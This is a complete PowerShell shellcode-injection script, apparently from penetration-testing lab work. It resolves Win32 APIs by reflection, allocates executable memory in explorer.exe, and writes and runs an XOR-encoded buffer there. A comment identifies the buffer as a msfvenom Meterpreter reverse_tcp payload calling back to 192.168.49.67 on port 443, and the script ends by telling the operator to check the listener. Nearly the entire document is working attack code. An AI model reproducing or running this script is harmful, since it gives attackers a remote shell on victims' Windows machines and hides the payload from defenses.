function LookupFunc {

    Param ($moduleName, $functionName)

    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |

    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].

    Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    $tmp=@()

    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}

    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,

    @($moduleName)), $functionName))

}



function getDelegateType {

    Param (

    [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,

    [Parameter(Position = 1)] [Type] $delType = [Void]

    )

    $type = [AppDomain]::CurrentDomain.

    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),

    [System.Reflection.Emit.AssemblyBuilderAccess]::Run).

    DefineDynamicModule('InMemoryModule', $false).

    DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',

    [System.MulticastDelegate])

    $type.

    DefineConstructor('RTSpecialName, HideBySig, Public',

    [System.Reflection.CallingConventions]::Standard, $func).

    SetImplementationFlags('Runtime, Managed')

    $type.

    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).

    SetImplementationFlags('Runtime, Managed')

    return $type.CreateType()

}



$procId = (Get-Process explorer).Id



# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f ps1

[Byte[]] $buf = 0xeb,0x27,0x5b,0x53,0x5f,0xb0,0x13,0xfc,0xae,0x75,0xfd,0x57,0x59,0x53,0x5e,0x8a,0x6,0x30,0x7,0x48,0xff,0xc7,0x48,0xff,0xc6,0x66,0x81,0x3f,0x94,0xc6,0x74,0x7,0x80,0x3e,0x13,0x75,0xea,0xeb,0xe6,0xff,0xe1,0xe8,0xd4,0xff,0xff,0xff,0x11,0x16,0x12,0x10,0x50,0x13,0xfa,0x31,0x49,0x43,0xf,0xa1,0x86,0xee,0xbe,0x25,0xec,0x41,0x4b,0x43,0xe,0x9b,0x10,0x22,0x17,0x18,0xee,0xd1,0x5a,0xef,0x96,0x77,0x97,0x2d,0x16,0x5c,0x65,0x11,0x92,0x2e,0xc0,0x64,0xfc,0xf9,0xf6,0xaf,0xf0,0xfe,0xc6,0xef,0xaf,0xee,0x4,0x2,0xb,0x41,0x7,0x86,0xeb,0x27,0x10,0x53,0x5f,0xb0,0x26,0xb7,0xae,0x75,0xfd,0x57,0x12,0x53,0x5e,0x8a,0x6,0x7b,0x7,0x48,0xff,0xc7,0x3,0xff,0xc6,0x66,0x81,0x74,0x38,0x44,0x74,0x7,0xcb,0x3e,0x26,0x75,0xea,0xa0,0xe6,0xff,0xe1,0xe8,0x9f,0xff,0xff,0xff,0x1b,0xc3,0x16,0x12,0x10,0x26,0xbb,0xaf,0x4d,0x41,0x4f,0xe0,0xae,0xea,0xbc,0x65,0xad,0xdf,0x4f,0x41,0x4e,0xda,0x8e,0x26,0x15,0x58,0xaf,0x4f,0x5e,0xed,0xd6,0x36,0x9,0x29,0xee,0x51,0x24,0x8f,0x96,0x2c,0x36,0x25,0x62,0xfd,0xf4,0xef,0xb1,0x60,0xc2,0xed,0xef,0xaf,0x9e,0x35,0x5d,0xb,0x57,0xae,0xeb,0x16,0x4,0x18,0xd0,0xb0,0x41,0xa3,0xe5,0xfa,0xfd,0x66,0x6,0x18,0xd1,0x8a,0x37,0x6f,0x4c,0xc7,0xff,0xf6,0x17,0xb4,0x49,0x66,0xb0,0x60,0xc8,0xda,0x74,0x36,0xdf,0x75,0xff,0x75,0xdb,0xb4,0xad,0x70,0xe1,0xd9,0x8b,0xb4,0x70,0xff,0x25,0x5c,0x43,0x8c,0x70,0xce,0x7b,0x18,0xdf,0x4b,0x82,0x47,0xb4,0x35,0x76,0xc4,0xb,0x6,0xdf,0x56,0xb8,0x4d,0x78,0x80,0x4b,0xda,0x9b,0xb,0x73,0xd2,0x54,0xd6,0x77,0x29,0x29,0x4d,0x5b,0xdf,0xb2,0x18,0x47,0xa1,0xa3,0x61,0xfc,0xc4,0xb4,0x97,0x73,0xeb,0xcd,0x54,0x5c,0x98,0xb,0x29,0xb4,0x6c,0xd4,0x53,0x6e,0xef,0x2b,0x73,0xae,0x44,0xa2,0x1c,0xd6,0x53,0x6f,0xd5,0x4d,0xbf,0x7,0x79,0xa0,0x8c,0xc7,0xff,0xf7,0x39,0xca,0xb0,0xd5,0x4c,0x2b,0x4c,0xf,0x3e,0x51,0x2a,0xa1,0x64,0xe6,0xce,0xbe,0xa3,0x5b,0xff,0xce,0xa0,0x4c,0x8c,0x14,0x32,0x3f,0xa7,0xab,0x4f,0x61,0x7,0xf8,0xc1,0xff,0x98,0x29,0xa2,0xdb,0x5e,0x61,0x15,0xc2,0x8e,0x33,0x22,0x14,0xb3,0x4b,0x5c,0xcd,0x9e,0x2e,0x1a,0x3c,0x71,0xdf,0x2b,0x8b,0x87,0xc,0x11,0x3d,0x62,0xe8,0xc3,0xa3,0xad,0x64,0xc0,0xcd,0xa7,0xb7,0x98,0x4,0x35,0x48,0x5,0x64,0x27,0x6a,0xc,0x14,0x3f,0xfb,0xcd,0xf1,0x3e,0x72,0x57,0x68,0xc,0x15,0x5,0x6,0x1,0x58,0x3,0x70,0xc7,0x79,0xa0,0x8d,0xe9,0x81,0xe,0x24,0xed,0xfb,0x7,0xb1,0x61,0xb0,0xfa,0xea,0xda,0xb9,0xb4,0x6e,0xe8,0xe5,0xa0,0xb4,0x70,0x7,0x32,0x4f,0x48,0x74,0xec,0x15,0x14,0x1b,0xd7,0xb3,0x52,0xa0,0xe2,0xf9,0xed,0x65,0x1,0x1b,0xc1,0x89,0x30,0x6c,0x5c,0xc4,0xf8,0xf5,0x7,0xb7,0x4e,0x65,0xa0,0x63,0x31,0xf3,0x64,0x35,0xd8,0x76,0xec,0x76,0xdc,0xb7,0xbd,0x73,0xe6,0xda,0x9b,0xb7,0x77,0xfc,0x19,0x4f,0x6c,0xa8,0x63,0xe1,0x6c,0x33,0xe8,0x64,0x95,0x15,0x83,0x1a,0x61,0xef,0x3c,0x29,0xc8,0x7d,0x8f,0x62,0x6f,0xab,0x7c,0xf5,0x8c,0x20,0x44,0xfd,0x43,0xfd,0x40,0x69,0x3b,0x66,0x6c,0xf0,0xa5,0x4a,0x70,0x8e,0xb4,0x4a,0xcb,0xeb,0xa3,0xbc,0x44,0xc4,0xda,0x79,0x6a,0xa9,0x7d,0xfc,0x59,0x36,0xcd,0x69,0xa8,0x49,0xb6,0x1f,0x44,0xe2,0x1,0x34,0xfd,0x78,0xaa,0x6f,0x52,0xb6,0x49,0xf0,0xa9,0x2d,0x79,0xe0,0x76,0xf8,0x65,0xa2,0x58,0x7b,0x59,0xf5,0x80,0x6,0x4d,0x93,0x81,0x4f,0xee,0xe6,0x9e,0xa1,0x71,0xc1,0xff,0x6c,0x47,0xbc,0x9,0xe1,0x6c,0x33,0xe8,0x64,0x95,0xee,0x83,0x1a,0x61,0xef,0x3c,0x29,0xc8,0x7d,0x8f,0x62,0x6f,0xab,0x7c,0xf5,0x8c,0x20,0x44,0xfd,0x43,0xfd,0x40,0x57,0x70,0x66,0x6c,0xf0,0xa5,0xb1,0x70,0x8e,0xb4,0x4a,0xcb,0xeb,0xa3,0xbc,0x44,0xc4,0xda,0x69,0x62,0xb1,0x86,0xec,0x51,0x2e,0xdd,0x61,0xb0,0x68,0xbe,0x7,0x54,0xea,0x19,0x24,0xf5,0x60,0xba,0x67,0x4a,0xa6,0x41,0xe8,0xb9,0x25,0x61,0xf0,0x7e,0xe0,0x75,0x3,0x9b,0x6b,0x51,0xed,0x90,0x3f,0x55,0x83,0x89,0x57,0xfe,0xee,0x86,0xb1,0x79,0xd9,0xef,0x7c,0x4f,0xa4,0x30,0xe1,0x6c,0x33,0xe8,0x64,0x95,0x4b,0x83,0x1a,0x61,0xef,0x3c,0x29,0xc8,0x7d,0x8f,0x62,0x6f,0xab,0x7c,0xf5,0x8c,0x20,0x44,0xfd,0x43,0xfd,0x40,0x77,0xab,0x66,0x6c,0xf0,0xa5,0x14,0x70,0x8e,0xb4,0x4a,0xcb,0xeb,0xa3,0xbc,0x44,0xc4,0xda,0x61,0x7a,0xb3,0x23,0xe4,0x49,0x2c,0xd5,0x79,0xb2,0x8b,0xa6,0x5,0x5c,0xf2,0x1b,0x2c,0xed,0x62,0xb2,0x7f,0x48,0xae,0x59,0xea,0xb1,0x3d,0x63,0xf8,0x66,0xe2,0x7d,0x63,0x91,0x63,0x49,0xef,0x98,0xcc,0x57,0x8b,0x91,0x55,0xf6,0xf6,0x84,0xb9,0x61,0xdb,0xe7,0x73,0x45,0xa9,0xc3,0xf4,0x6c,0x2e,0xfd,0x64,0x88,0x7f,0x83,0x7,0x74,0xef,0x21,0x3c,0xc8,0x60,0x9a,0x62,0x72,0xbe,0x7c,0xe8,0x99,0x20,0x59,0xe8,0x43,0xe0,0x55,0xc0,0x7e,0x73,0x6c,0xed,0xb0,0x35,0x6d,0x9b,0xb4,0x57,0xde,0xeb,0xbe,0xa9,0x44,0xd9,0xcf,0x78,0x63,0xb7,0xfb,0x29,0x21,0x22,0xdd,0x87,0x9c,0x84,0xe0,0xd8,0xd0,0x49,0x16,0x27,0xf4,0xb0,0x3a,0x58,0x7c,0xe0,0xfa,0xd4,0x3a,0x9b,0x59,0x59,0x95,0x5a,0x69,0x31,0x44,0x11,0xda,0x57,0x3f,0x5a,0xcb,0x8b,0x88,0x4a,0xec,0xee,0xbb,0x93,0x75,0xdd,0x1d,0x74,0xc6,0x5a,0x6,0x51,0x5,0x22,0xb,0x20,0xcc,0xd2,0x17,0x5c,0x43,0x56,0x2d,0x2e,0xc,0x30,0x35,0x7e,0x2,0x53,0xee,0x57,0xb4,0xb3,0xc8,0xba,0x7,0x3f,0x8a,0xdd,0x6,0x92,0x48,0x63,0xee,0xd4,0xfb,0x82,0xbd,0x58,0xdc,0xc3,0xa1,0x97,0x59,0x2a,0x24,0x67,0x85,0x92,0x56,0x55,0x30,0xdc,0x41,0xde,0xb2,0x5,0xa6,0xe7,0x7c,0x58,0xc,0xf6,0xb9,0x17,0x33,0x35,0x99,0x67,0x58,0xf1,0xbc,0x17,0x3,0x8,0x4c,0x71,0x3a,0xaa,0xad,0x20,0x84,0x1,0x40,0xd1,0xda,0x97,0x9a,0x40,0xd1,0xec,0x8d,0x9b,0x9e,0x3b,0xdf,0x8f,0x65,0xe2,0x67,0x48,0xee,0xa8,0x5a,0x80,0x50,0x9c,0x3d,0xed,0x5a,0x59,0xe1,0x6b,0xbe,0x24,0x50,0x8e,0x98,0xf9,0xde,0xcc,0x30,0xfc,0x84,0x84,0xe3,0x8,0x65,0x21,0x2a,0xcf,0xb,0x9a,0x6d,0xd0,0xfa,0x98,0xa2,0x78,0xd6,0xe0,0xb4,0x71,0xaf,0xfb,0xd7,0x4f,0x20,0xfb,0x5a,0xa3,0x9,0x98,0x31,0x4a,0xe9,0x32,0x1f,0xeb,0x6e,0x9c,0x5c,0x59,0xa5,0x67,0xde,0xa7,0x26,0x4a,0xcb,0x60,0xee,0x53,0xc3,0x79,0x68,0x77,0xdb,0x8e,0x5e,0x7e,0xb8,0x97,0x59,0xd8,0xd5,0x95,0xb2,0x5f,0xef,0xf1,0x7b,0x75,0xf9,0xdd,0x22,0x22,0x19,0xf3,0x99,0xb3,0xb7,0xdb,0xdb,0xc6,0x6f,0x30,0x2c,0xf7,0x8b,0x14,0x46,0x62,0xd3,0xc1,0xd7,0x2c,0xbd,0x7f,0x52,0x96,0x61,0x6,0x7e,0x5a,0x22,0xe1,0x54,0x18,0x7c,0xed,0x80,0x8b,0x71,0xc2,0xf0,0xa5,0xa0,0x4e,0xde,0x2,0xfa,0x9e,0x94,0x75,0x6b,0x2b,0xda,0xb2,0xe0,0xa9,0x3,0x85,0xd9,0x67,0x5e,0x2f,0xc8,0xa2,0x11,0x10,0xb,0x82,0x61,0x7b,0xcf,0xa7,0x11,0x20,0x36,0x9,0x2e,0x19,0x94,0xb6,0x26,0x77,0x3f,0x5b,0xd7,0xf9,0xa9,0x81,0x46,0xf2,0xd2,0x96,0x9d,0xaf,0x1a,0xe0,0x38,0xf5,0x71,0xc8,0xeb,0xa6,0x44,0xaa,0x3a,0x50,0x1c,0x27,0xf0,0x6f,0x7a,0x2f,0x48,0x68,0x6a,0x5c,0xee,0x39,0xfd,0x7b,0x56,0xe9,0x3,0xaf,0x7a,0x8f,0x2,0x4e,0xfd,0xab,0x51,0x22,0x29,0x83,0xd3,0x41,0x62,0xc9,0xca,0x6f,0x43,0x4e,0x99,0xe,0x13,0x6d,0x39,0x71,0x91,0x15,0x7f,0xbb,0xb8,0xa2,0x53,0x1d,0xb1,0x94,0x78,0x6a,0x4b,0xe1,0x16,0x8a,0x7b,0x40,0xc6,0x24,0x9c,0x75,0x2a,0xb7,0x1f,0x3b,0x77,0xc,0x6e,0x69,0x92,0xa8,0x6c,0x62,0x51,0xb7,0xb9,0x84,0xd8,0x6e,0xb5,0x20,0x6b,0xf7,0xa4,0xc6,0x7d,0x41,0x6c,0xae,0xb,0x6d,0x13,0x3b,0xd2,0xe2,0xf,0x5c,0xc,0x72,0x6d,0xd6,0x68,0x37,0x40,0x66,0x5a,0xe3,0xb9,0x37,0x1e,0xc,0x8b,0x22,0x45,0x7c,0x72,0x20,0x8d,0xca,0xe1,0xfc,0xe2,0x6a,0x38,0xbb,0xce,0x2c,0x85,0x1e,0x6c,0x61,0x1d,0x2e,0x75,0xbf,0x77,0x3d,0x81,0x1b,0x6d,0x78,0x67,0xf9,0x24,0x96,0x53,0x8,0xbd,0x18,0xc1,0xae,0x7,0x37,0x1d,0x29,0x6f,0x10,0xc,0x72,0x6d,0x74,0xb5,0x7e,0xf9,0xee,0x4a,0x54,0x71,0xa6,0xd4,0x60,0x5d,0x33,0x1e,0xeb,0x62,0x50,0x14,0x27,0xfa,0x75,0xa8,0x8b,0x59,0xfb,0x5d,0xeb,0x85,0x33,0xdc,0x74,0x44,0x2a,0xda,0xa5,0xdb,0x4f,0xaf,0x91,0x4a,0x7d,0x6a,0xcc,0x13,0xc1,0x28,0x56,0x5e,0x4c,0x80,0x25,0x4a,0x29,0x10,0x2b,0xc9,0x44,0xc4,0x9f,0x1d,0x34,0x3e,0x7a,0x38,0x26,0xf7,0x55,0xcc,0x74,0x95,0x3c,0xd1,0xaa,0xec,0xab,0x13,0x50,0x19,0x2f,0x29,0xd9,0x67,0xee,0x88,0xfb,0xb5,0x58,0x12,0x4d,0x9a,0xd2,0xcb,0x2e,0xd8,0x5d,0x5a,0x5,0x51,0x6e,0xb5,0x79,0x62,0xc8,0x4d,0x32,0x71,0x9,0x92,0xab,0xea,0x2f,0x4a,0x21,0x9,0xf2,0x62,0x3d,0x8c,0x3e,0x8c,0xf5,0x76,0x85,0xb1,0xe7,0x9b,0xde,0x38,0x89,0x55,0x70,0x8a,0xab,0x5,0x10,0xd0,0x1e,0x92,0x86,0x5f,0xe8,0x63,0xee,0xbe,0xd0,0x1f,0x55,0x3d,0x27,0x14,0xcf,0x56,0xeb,0xa8,0xf6,0x88,0x9d,0xf5,0x1a,0xd4,0xdf,0xf6,0xf7,0xa4,0xc6,0x10,0x40,0x92,0xb0,0xf5,0xc0,0xe3,0xec,0x59,0xa2,0x2f,0x44,0xc6,0x9f,0xad,0x7d,0xb7,0x98,0x3c,0x9e,0xdb,0x76,0x74,0x37,0xcd,0x70,0x8a,0x93,0x5,0x10,0x38,0xc8,0x85,0x39,0x5f,0xe8,0xa8,0x9f,0x79,0xc4,0x5a,0x5c,0xe6,0xaf,0xbd,0x73,0x97,0x94,0x3b,0xf7,0x73,0x5d,0x38,0x6e,0xa5,0x20,0x23,0x33,0x3c,0xfa,0x93,0xfb,0x25,0x4f,0x49,0x64,0xb1,0x27,0xfd,0xf1,0xca,0xf3,0x90,0x3b,0x34,0xf6,0x77,0xf3,0xb6,0xe2,0x23,0xd5,0x39,0xff,0x65,0x70,0x8a,0xb0,0xc,0x23,0xc3,0x50,0xf7,0x64,0x79,0xf5,0x74,0x98,0xac,0x39,0xf7,0x14,0x18,0x43,0xc5,0x6c,0x49,0x3b,0x39,0xb7,0x72,0x4,0x50,0x2f,0xed,0x4a,0x23,0x28,0x25,0x8,0x11,0x26,0x62,0x4e,0x7f,0xf0,0x5c,0x26,0x18,0x18,0x5a,0x62,0x8,0x12,0x42,0xe0,0x77,0x85,0xbf,0x46,0x2e,0xe3,0x8f,0x89,0xdd,0x39,0xc0,0x22,0x6d,0x6c,0x72,0x94,0xbb,0x13,0x14,0x7c,0xd4,0x80,0x21,0xd0,0xf,0x4d,0xde,0x8b,0x80,0x7,0x14,0x23,0xd8,0x6d,0xcd,0xd1,0x50,0x2d,0xc0,0xe3,0x75,0x33,0xdd,0x7a,0x48,0x1a,0x20,0x90,0xb0,0xb6,0x64,0x13,0x90,0x9,0xf7,0xb5,0xec,0xdf,0x58,0x5f,0x23,0x8,0xa2,0x9b,0x7a,0x4d,0x24,0xed,0xdc,0x80,0xe4,0x22,0xed,0xa6,0x83,0x64,0xec,0x11,0x38,0x44,0x14,0x1c,0x94,0xc6





# C#: IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, procId);

$hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),

  (getDelegateType @([UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke(0x001F0FFF, 0, $procId)



# C#: IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);

$expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx), 

  (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40)



# C#: bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);

$procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory), 

  (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr])([Bool]))).Invoke($hProcess, $expAddr, $buf, [Uint32]$buf.Length, [IntPtr]::Zero)         



# C#: IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread),

  (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero)



Write-Host "Injected! Check your listener!"